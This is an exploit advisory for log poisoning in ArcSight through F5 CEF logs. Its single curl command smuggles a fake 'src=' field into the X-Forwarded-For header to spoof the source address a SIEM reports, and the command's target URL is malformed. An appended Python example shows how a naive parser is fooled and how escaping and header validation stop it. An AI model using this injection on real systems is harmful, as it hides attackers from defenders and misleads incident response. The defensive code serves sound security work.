Exploit Title: ArcSight Log Poisoning on F5 CEF log
Date: Jun 25th 2015
Exploit Author: Andrea Menin (linkedin.com/in/andreamenin)
Video: https://www.youtube.com/watch?v=SgFHt37p_Lw

Description:
------------
The attacker address value shown in an ArcSight report can be changed by poisoning the F5 log.
An attacker can request a page with a "malicious header" and replace the content of the "src" CEF parameter.

Exploit:
--------
By firing an F5 ASM rule, you can inject the "src" parameter inside the X-Forwarded-For header:

    curl -v -H "X-Forwarded-For: 127.0.0.1 src=8.8.8.8 cs6=" "http:///cmd.exe"

--
Andrea (aka theMiddle) Menin
menin.andrea [at] gmail.com
linkedin.com/in/andreamenin
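Added example, not part of the original advisory: a defender's view of why the header value above overrides "src", and two checks that stop it (escaping the value per CEF extension rules before logging, and rejecting X-Forwarded-For values that are not plain IP lists). The extension layout (header value carried in cs5), the last-wins parser, the function names and the address 203.0.113.10 are assumptions made for illustration.

```python
import ipaddress
import re

# A CEF extension is a run of space-separated key=value pairs.
_KEY = re.compile(r"(?:^|\s)([A-Za-z0-9_]+)=")

def parse_extension(ext):
    """Naive parser: a value runs to the next ' key=', repeated keys are last-wins."""
    fields = {}
    hits = list(_KEY.finditer(ext))
    for i, m in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(ext)
        fields[m.group(1)] = ext[m.end():end].strip()
    return fields

def cef_escape(value):
    """Escape backslash, '=', CR and LF as CEF requires inside extension values."""
    return (value.replace("\\", "\\\\").replace("=", "\\=")
                 .replace("\r", "\\r").replace("\n", "\\n"))

def xff_is_clean(header):
    """True only when every comma-separated element is a bare IP address."""
    try:
        for part in header.split(","):
            ipaddress.ip_address(part.strip())
    except ValueError:
        return False
    return True

def build_extension(src, xff, escape):
    """Constructed layout: real source first, then the header value in cs5."""
    value = cef_escape(xff) if escape else xff
    return f"src={src} cs5={value} cs6=N/A"

# Header value from the advisory; 203.0.113.10 is a constructed client address.
POISONED = "127.0.0.1 src=8.8.8.8 cs6="

if __name__ == "__main__":
    for escape in (False, True):
        line = build_extension("203.0.113.10", POISONED, escape)
        print(escape, parse_extension(line)["src"], "|", line)
    print("XFF well-formed:", xff_is_clean(POISONED))
```

On the SIEM side, a CEF event that carries the same key twice, or an X-Forwarded-For value that fails `xff_is_clean`, is worth alerting on in its own right.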